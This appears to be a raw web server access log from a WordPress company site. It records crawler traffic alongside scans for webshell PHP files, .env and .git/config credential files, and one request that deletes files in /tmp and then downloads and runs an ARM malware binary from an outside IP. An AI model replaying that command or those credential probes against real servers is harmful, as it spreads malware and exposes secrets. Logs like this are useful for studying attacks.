40.69.138.28 - - [23/Oct/2025:03:08:24 +0800] "GET /0.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:24 +0800] "GET /07.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:24 +0800] "GET /1.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:25 +0800] "GET /123.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:25 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:26 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:26 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:27 +0800] "GET /adminfuns.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:27 +0800] "GET /akc.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:28 +0800] "GET /akcc.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:28 +0800] "GET /asasx.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:29 +0800] "GET /asd.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:29 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:30 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:30 +0800] "GET /axx.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:31 +0800] "GET /berax.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:31 +0800] "GET /build.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:31 +0800] "GET /buy.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:32 +0800] "GET /checkbox.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:32 +0800] "GET /chosen.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:33 +0800] "GET /classwithtostring.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:33 +0800] "GET /cong.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:34 +0800] "GET /css.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:34 +0800] "GET /dropdown.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:35 +0800] "GET /edit.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:35 +0800] "GET /file2.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:36 +0800] "GET /file4.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:36 +0800] "GET /filemanager.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:36 +0800] "GET /flower.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:37 +0800] "GET /form.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:37 +0800] "GET /gecko.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:38 +0800] "GET /kyami.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:38 +0800] "GET /makeasmtp.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:39 +0800] "GET /manager.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:39 +0800] "GET /mari.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:39 +0800] "GET /moon.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:40 +0800] "GET /nc4.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:40 +0800] "GET /new.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:41 +0800] "GET /wp-activate.php HTTP/1.1" 302 5 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:42 +0800] "GET /wp-login.php?action=register HTTP/1.1" 302 5 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:43 +0800] "GET /wp-login.php?registration=disabled HTTP/1.1" 200 8853 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:43 +0800] "GET /wp-admin.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:44 +0800] "GET /wp-trackback.php HTTP/1.1" 404 140 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:45 +0800] "GET /xmlrpc.php HTTP/1.1" 405 53 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:45 +0800] "GET /xmrlpc.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [23/Oct/2025:03:11:15 +0800] "POST /wp-cron.php?doing_wp_cron=1761160275.4251849651336669921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.177.72.38 - - [23/Oct/2025:03:11:15 +0800] "GET / HTTP/1.1" 301 5 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:16 +0800] "GET / HTTP/1.1" 200 33932 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:20 +0800] "GET /.git/config HTTP/1.1" 404 8989 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:21 +0800] "GET /.env HTTP/1.1" 404 8989 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:22 +0800] "GET /api/.env HTTP/1.1" 404 8989 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:23 +0800] "GET /config/.env HTTP/1.1" 404 8989 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:24 +0800] "GET /.env.example HTTP/1.1" 404 8990 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:25 +0800] "GET /.env.production HTTP/1.1" 404 8989 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:26 +0800] "GET /.env.dev HTTP/1.1" 404 8989 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:27 +0800] "GET /backend/.env HTTP/1.1" 404 8989 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:27 +0800] "GET /.env.backup HTTP/1.1" 404 8989 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:29 +0800] "GET /_profiler/phpinfo HTTP/1.1" 404 8988 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:30 +0800] "GET /phpinfo.php HTTP/1.1" 404 47 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:31 +0800] "GET /phpinfo HTTP/1.1" 404 8989 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:31 +0800] "GET /info.php HTTP/1.1" 200 49 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:31 +0800] "GET /test.php HTTP/1.1" 404 47 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:32 +0800] "GET /info HTTP/1.1" 404 8989 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:32 +0800] "GET /php.php HTTP/1.1" 404 47 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:32 +0800] "GET /i.php HTTP/1.1" 404 47 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:33 +0800] "GET /test HTTP/1.1" 404 8989 "-" "python-httpx/0.28.1"
185.177.72.38 - - [23/Oct/2025:03:11:33 +0800] "GET /phpversion.php HTTP/1.1" 404 47 "-" "python-httpx/0.28.1"
219.139.231.7 - - [23/Oct/2025:03:14:23 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+23.177.185.39/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1" 499 0 "-" "r00ts3c-owned-you"
36.133.115.36 - - [23/Oct/2025:03:14:23 +0800] "POST /wp-cron.php?doing_wp_cron=1761160463.7867429256439208984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [23/Oct/2025:03:32:04 +0800] "POST /wp-cron.php?doing_wp_cron=1761161524.4602069854736328125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.84 - - [23/Oct/2025:03:32:04 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Oct/2025:03:39:08 +0800] "POST /wp-cron.php?doing_wp_cron=1761161948.2549059391021728515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.84 - - [23/Oct/2025:03:39:08 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Oct/2025:04:18:56 +0800] "POST /wp-cron.php?doing_wp_cron=1761164336.4535911083221435546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [23/Oct/2025:04:18:58 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:04:36:04 +0800] "POST /wp-cron.php?doing_wp_cron=1761165364.2494900226593017578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [23/Oct/2025:04:36:05 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
85.208.96.194 - - [23/Oct/2025:04:50:44 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.1" 200 22064 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
69.160.160.58 - - [23/Oct/2025:04:56:38 +0800] "GET / HTTP/1.1" 200 33932 "http://cqqizhou.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Nicecrawler/1.1; +http://www.nicecrawler.com/) Chrome/90.0.4430.97 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:39 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/80.0.3987.163 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:41 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/80.0.3987.163 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:41 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/80.0.3987.163 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:41 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/80.0.3987.163 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:41 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/80.0.3987.163 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:41 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/80.0.3987.163 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:42 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1756373176" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/80.0.3987.163 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:42 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/80.0.3987.163 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:42 +0800] "GET /wp-content/uploads/2025/07/1751967322-Storage-processing_images_W900%C3%97300.webp HTTP/1.1" 200 23120 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1756373176" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/80.0.3987.163 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:43 +0800] "GET /wp-content/uploads/2025/07/1751829454-Smart-warehousing800x500.webp HTTP/1.1" 200 79504 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1756373176" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/80.0.3987.163 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:49 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px.webp HTTP/1.1" 200 52418 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/80.0.3987.163 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:49 +0800] "GET /about/ HTTP/1.1" 200 30091 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:04:56:50 +0800] "POST /wp-cron.php?doing_wp_cron=1761166610.0394990444183349609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
69.160.160.58 - - [23/Oct/2025:04:56:50 +0800] "GET /wp-content/uploads/2025/07/1750649212-qizhou1920x1080_10.webp HTTP/1.1" 200 143362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:50 +0800] "GET /portfolio/duplex-stainless-steel/ HTTP/1.1" 200 22108 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:50 +0800] "GET /industry/ HTTP/1.1" 200 21960 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:50 +0800] "GET /portfolio-tag/%e9%9e%8d%e9%92%a2%e8%92%82%e6%a3%ae/ HTTP/1.1" 200 22717 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:51 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:51 +0800] "GET /portfolio/ HTTP/1.1" 200 20567 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:52 +0800] "GET /material.html HTTP/1.1" 200 6459 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:52 +0800] "GET /portfolio/remaining-rolls/ HTTP/1.1" 200 22120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:52 +0800] "GET /logistics/ HTTP/1.1" 200 22415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:52 +0800] "GET /wp-content/uploads/2025/07/1750649200-qizhou1920x1080_7.webp HTTP/1.1" 200 238866 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:53 +0800] "GET /portfolio/pickled-coil/ HTTP/1.1" 200 22123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:53 +0800] "GET /policy/ HTTP/1.1" 200 23662 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:54 +0800] "GET /portfolio/hot-dip-galvanized-coil/ HTTP/1.1" 200 22263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:54 +0800] "GET /services/ HTTP/1.1" 200 25527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:55 +0800] "GET /portfolio-category/pickled-coil/ HTTP/1.1" 200 20940 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:55 +0800] "GET /2215/ HTTP/1.1" 200 24291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:55 +0800] "GET /2159/ HTTP/1.1" 200 29023 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:56 +0800] "GET /wp-content/uploads/2025/07/1750649189-qizhou1920x1080_4.webp HTTP/1.1" 200 174962 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:56 +0800] "GET /bug HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:57 +0800] "GET /portfolio/%e5%86%b7%e8%bd%a7%e5%8d%b7/ HTTP/1.1" 200 22063 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:57 +0800] "GET /bug/ HTTP/1.1" 200 12824 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:58 +0800] "GET /wp-content/uploads/2025/07/1750649183-qizhou1920x1080_2.webp HTTP/1.1" 200 267936 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:56:59 +0800] "GET /2231/ HTTP/1.1" 200 23675 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
69.160.160.58 - - [23/Oct/2025:04:57:01 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
36.133.115.36 - - [23/Oct/2025:04:59:22 +0800] "POST /wp-cron.php?doing_wp_cron=1761166762.5617480278015136718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.171.207.97 - - [23/Oct/2025:04:59:22 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
85.208.96.208 - - [23/Oct/2025:06:16:01 +0800] "GET /2164/ HTTP/1.1" 200 23827 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [23/Oct/2025:06:31:50 +0800] "POST /wp-cron.php?doing_wp_cron=1761172310.6863710880279541015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
135.237.126.204 - - [23/Oct/2025:06:31:50 +0800] "GET /actuator/health HTTP/1.1" 404 8988 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [23/Oct/2025:06:45:00 +0800] "POST /wp-cron.php?doing_wp_cron=1761173100.6851360797882080078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.249.68.71 - - [23/Oct/2025:06:45:00 +0800] "GET /portfolio/duplex-stainless-steel/ HTTP/1.1" 200 18675 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.107 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [23/Oct/2025:07:31:07 +0800] "POST /wp-cron.php?doing_wp_cron=1761175867.3262310028076171875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [23/Oct/2025:07:31:08 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:07:43:25 +0800] "POST /wp-cron.php?doing_wp_cron=1761176605.4574279785156250000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [23/Oct/2025:07:43:26 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:08:06:12 +0800] "POST /wp-cron.php?doing_wp_cron=1761177972.2197079658508300781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
147.185.133.246 - - [23/Oct/2025:08:06:12 +0800] "GET / HTTP/1.1" 200 33467 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [23/Oct/2025:08:11:17 +0800] "POST /wp-cron.php?doing_wp_cron=1761178277.4955101013183593750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [23/Oct/2025:08:11:18 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:08:13:40 +0800] "POST /wp-cron.php?doing_wp_cron=1761178420.3543789386749267578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.168.127.100 - - [23/Oct/2025:08:13:40 +0800] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:08:13:40 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:08:13:41 +0800] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:08:13:42 +0800] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:08:13:43 +0800] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:08:13:44 +0800] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:08:13:45 +0800] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:08:13:45 +0800] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:08:13:46 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/new" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:08:13:47 +0800] "POST /wp-cron.php?doing_wp_cron=1761178427.0452299118041992187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.168.127.100 - - [23/Oct/2025:08:13:47 +0800] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:08:13:47 +0800] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:08:13:48 +0800] "HEAD / HTTP/1.1" 200 0 "http://cqqizhou.com/home" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
